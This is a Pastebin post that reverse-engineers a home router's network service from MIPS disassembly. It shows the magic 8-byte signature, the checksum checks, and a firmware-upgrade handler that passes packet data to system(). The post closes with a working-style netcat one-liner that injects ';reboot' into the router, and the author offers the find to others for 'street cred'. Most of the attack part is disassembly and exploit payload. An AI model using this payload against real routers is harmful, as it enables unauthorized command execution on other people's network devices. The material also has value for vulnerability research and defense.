Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SOHO routers being hyped to the point of silly IDA workshops, i mean common, really?
- That stuff is basically kindergarten level of the 90s.
- If you want some cheap street cred, here goes after 20mins of looking at my home router. Feel free to blog or make a youtube video about it:
- echo "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2\x00\x00\xff\x00\x00\x02;reboot\x00" | nc router [31727](url=http://seclists.org/nmap-dev/2013/q2/426)
- .text:004011CC move $a0, $s2
- .text:004011D0 beq $v0, $s4, loc_4010BC
- .text:004011D4 addiu $a2, $fp, 0xD8+var_30
- .text:004011D8 la $t9, accept
- .text:004011DC nop
- .text:004011E0 jalr $t9 ; accept
- .text:004011E4 nop
- .text:004011E8 lw $gp, 0xD8+var_C8($fp)
- .text:004011EC move $s1, $v0
- .text:004011F0 move $a3, $zero
- .text:004011F4 move $a1, $s3
- .text:004011F8 move $a0, $s1
- .text:004011FC beq $s1, $s4, loc_4012AC
- .text:00401200 li $a2, 0x5DC
- .text:00401204 la $t9, recv
- .text:00401208 nop
- .text:0040120C jalr $t9 ; recv
- .text:00401210 nop
- User name is 8 bytes, "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2":
- .rodata:00403820 COMM_SIGN: .byte 0xC6 # DATA XREF: dispatch:loc_4014E0o
- .rodata:00403820 # send_ack+3Co ...
- .rodata:00403821 .byte 0x52 # R
- .rodata:00403822 .byte 0x46 # F
- .rodata:00403823 .byte 0x31 # 1
- .rodata:00403824 .byte 0xC8 # + # DATA XREF: send_ack+64r
- .rodata:00403825 .byte 0x9C # £
- .rodata:00403826 .byte 0xC4 # -
- .rodata:00403827 .byte 0xE2 # G
- .text:004014E0 # ---------------------------------------------------------------------------
- .text:004014E0
- .text:004014E0 loc_4014E0: # CODE XREF: dispatch+30j
- .text:004014E0 la $a1, COMM_SIGN
- .text:004014E4 move $a0, $s0
- .text:004014E8 li $a2, 8
- .text:004014EC la $t9, memcmp
- .text:004014F0 nop
- .text:004014F4 jalr $t9 ; memcmp
- .text:004014F8 nop
- .text:004014FC lw $gp, 0x30+var_20($sp)
- .text:00401500 beqz $v0, loc_40151C
- .text:00401504 nop
- .text:00401508 la $a0, 0x400000
- .text:0040150C nop
- .text:00401510 addiu $a0, (aSignatureMisma - 0x400000) # "signature mismatch!!\n"
- .text:00401514 b loc_4015F8
- .text:00401518 nop
- Password is a tricky beast:
- First pass \0 to buf[9] to deal with this wtf:
- .text:0040151C # ---------------------------------------------------------------------------
- .text:0040151C
- .text:0040151C loc_40151C: # CODE XREF: dispatch+88j
- .text:0040151C lbu $v0, 9($s0)
- .text:00401520 nop
- .text:00401524 beqz $v0, loc_401554
- .text:00401528 li $a0, 0xFF
- .text:0040152C lbu $v1, 0xB($s0)
- .text:00401530 nop
- .text:00401534 addu $v0, $v1
- .text:00401538 beq $v0, $a0, loc_401554
- .text:0040153C nop
- .text:00401540 la $a0, 0x400000
- .text:00401544 nop
- .text:00401548 addiu $a0, (aIsnTRequestCom - 0x400000) # "Isn't REQUEST command or checksum erro"...
- .text:0040154C b loc_4015F8
- .text:00401550 nop
- after which buf[0x8] and buf[0xa] must give 0xff in sum:
- .text:00401554 loc_401554: # CODE XREF: dispatch+ACj
- .text:00401554 # dispatch+C0j
- .text:00401554 lbu $a1, 8($s0)
- .text:00401558 lbu $v0, 0xA($s0)
- .text:0040155C li $v1, 0xFF
- .text:00401560 addu $v0, $a1, $v0
- .text:00401564 beq $v0, $v1, loc_401580
- .text:00401568 nop
- .text:0040156C la $a0, 0x400000
- .text:00401570 nop
- .text:00401574 addiu $a0, (aCommandChecksu - 0x400000) # "command checksum error!!\n"
- .text:00401578 b loc_4015F8
- .text:0040157C nop
- Finally comes the command line, buf[0xc] = 0 for all intents and purposes, buf[0xd] according to _fdata table, function arguments are buf[0xe]...
- .text:00401580 loc_401580: # CODE XREF: dispatch+ECj
- .text:00401580 la $a0, _fdata
- .text:00401584 nop
- .text:00401588 lbu $v0, (_fdata - 0x10000000)($a0)
- .text:0040158C nop
- .text:00401590 beqz $v0, loc_401640
- .text:00401594 move $s1, $zero
- .text:00401598 move $v1, $a0
- .text:0040159C addiu $a3, $a0, (off_10000004 - 0x10000000)
- .text:004015A0 move $a0, $zero
- .text:004015A4 lbu $v0, (_fdata - 0x10000000)($v1)
- .text:004015A8
- .text:004015A8 loc_4015A8: # CODE XREF: dispatch+1A4j
- .text:004015A8 addiu $a0, 8
- .text:004015AC bne $v0, $a1, loc_401614
- .text:004015B0 addiu $v1, 8
- .text:004015B4 lbu $a2, 0xC($s0)
- .text:004015B8 lbu $v0, 0xD($s0)
- .text:004015BC sll $a2, 8
- .text:004015C0 addu $v1, $s1, $a3
- .text:004015C4 addu $a2, $v0
- .text:004015C8 lw $v0, 0($v1)
- .text:004015CC move $a0, $s2
- .text:004015D0 addiu $a1, $s0, 0xE
- .text:004015D4 move $t9, $v0
- .text:004015D8 jalr $t9
- .text:004015DC nop
- .text:004015E0 lw $gp, 0x30+var_20($sp)
- .text:004015E4 bgez $v0, loc_401624
- .text:004015E8 nop
- .text:004015EC la $a0, 0x400000
- .text:004015F0 nop
- .text:004015F4 addiu $a0, (aCallFunctionRe - 0x400000) # "call function return error!!\n"
- .data:10000000 # Segment type: Pure data
- .data:10000000 .data
- .data:10000000 .globl _fdata
- .data:10000000 _fdata: .word 1 # DATA XREF: dispatch:loc_401580o
- .data:10000000 # dispatch+110r ...
- .data:10000000 # Alternative name is '_fdata'
- .data:10000000 # command
- .data:10000004 off_10000004: .word get_info # DATA XREF: dispatch+124o
- .data:10000008 .word 2
- .data:1000000C .word write_id
- .data:10000010 .word 4
- .data:10000014 .word upgrade_fw
- .data:10000018 .word 6
- .data:1000001C .word set_domain
- .data:10000020 .word 0
- .data:10000024 .word 0
- .data:10000028 .align 4
- Of course, we'd like to update firmware:
- .text:00401D94 .globl upgrade_fw
- .text:00401D94 upgrade_fw: # DATA XREF: .data:10000014o
- .text:00401D94 # .got:upgrade_fw_ptro
- .text:00401D94
- .text:00401D94 var_90 = -0x90
- .text:00401D94 var_8C = -0x8C
- .text:00401D94 var_88 = -0x88
- .text:00401D94 var_80 = -0x80
- .text:00401D94 var_78 = -0x78
- .text:00401D94 var_10 = -0x10
- .text:00401D94 var_C = -0xC
- .text:00401D94 var_8 = -8
- .text:00401D94 var_4 = -4
- .text:00401D94
- .text:00401D94 li $gp, 0xFC0629C
- .text:00401D9C addu $gp, $t9
- .text:00401DA0 addiu $sp, -0xA0
- .text:00401DA4 sw $gp, 0xA0+var_80($sp)
- .text:00401DA8 la $v0, 0x400000
- .text:00401DAC nop
- .text:00401DB0 addiu $v0, (aCommandIsUpgra - 0x400000) # "command is UPGRADE_FW\n"
- .text:00401DB4 sw $s1, 0xA0+var_C($sp)
- .text:00401DB8 sw $s0, 0xA0+var_10($sp)
- .text:00401DBC move $s1, $a0
- .text:00401DC0 move $s0, $a1
- .text:00401DC4 move $a0, $v0
- .text:00401DC8 sw $ra, 0xA0+var_4($sp)
- .text:00401DCC sw $gp, 0xA0+var_8($sp)
- .text:00401DD0 la $t9, printf
- .text:00401DD4 nop
- .text:00401DD8 jalr $t9 ; printf
- .text:00401DDC nop
- .text:00401DE0 lw $gp, 0xA0+var_80($sp)
- .text:00401DE4 lbu $a2, 0($s0)
- .text:00401DE8 lbu $a3, 1($s0)
- .text:00401DEC lbu $v1, 3($s0)
- .text:00401DF0 lbu $v0, 2($s0)
- .text:00401DF4 addiu $a0, $sp, 0xA0+var_78
- .text:00401DF8 la $a1, 0x400000
- .text:00401DFC nop
- .text:00401E00 addiu $a1, (aTftpGwGetD_D_D - 0x400000) # "tftp gw get %d.%d.%d.%d:/%s"
- .text:00401E04 addiu $s0, 4
- .text:00401E08 sw $s0, 0xA0+var_88($sp)
- .text:00401E0C sw $v0, 0xA0+var_90($sp)
- .text:00401E10 sw $v1, 0xA0+var_8C($sp)
- .text:00401E14 la $t9, sprintf
- .text:00401E18 nop
- .text:00401E1C jalr $t9 ; sprintf
- .text:00401E20 nop
- .text:00401E24 lw $gp, 0xA0+var_80($sp)
- .text:00401E28 addiu $a1, $sp, 0xA0+var_78
- .text:00401E2C la $a0, 0x400000
- .text:00401E30 nop
- .text:00401E34 addiu $a0, (aUseCommandS - 0x400000) # "use command '%s'\n"
- .text:00401E38 la $t9, printf
- .text:00401E3C nop
- .text:00401E40 jalr $t9 ; printf
- .text:00401E44 nop
- .text:00401E48 lw $gp, 0xA0+var_80($sp)
- .text:00401E4C addiu $a0, $sp, 0xA0+var_78
- .text:00401E50 la $t9, system
- .text:00401E54 nop
- .text:00401E58 jalr $t9 ; system
- Well thank you. The final "exploit", or is it shellcode would be something along the lines of "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2\x00\x00\xff\x00\x00\x02;reboot\x00" but didn't test it. I'm too lazy to ruin my openwrt on my BR-6104K.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement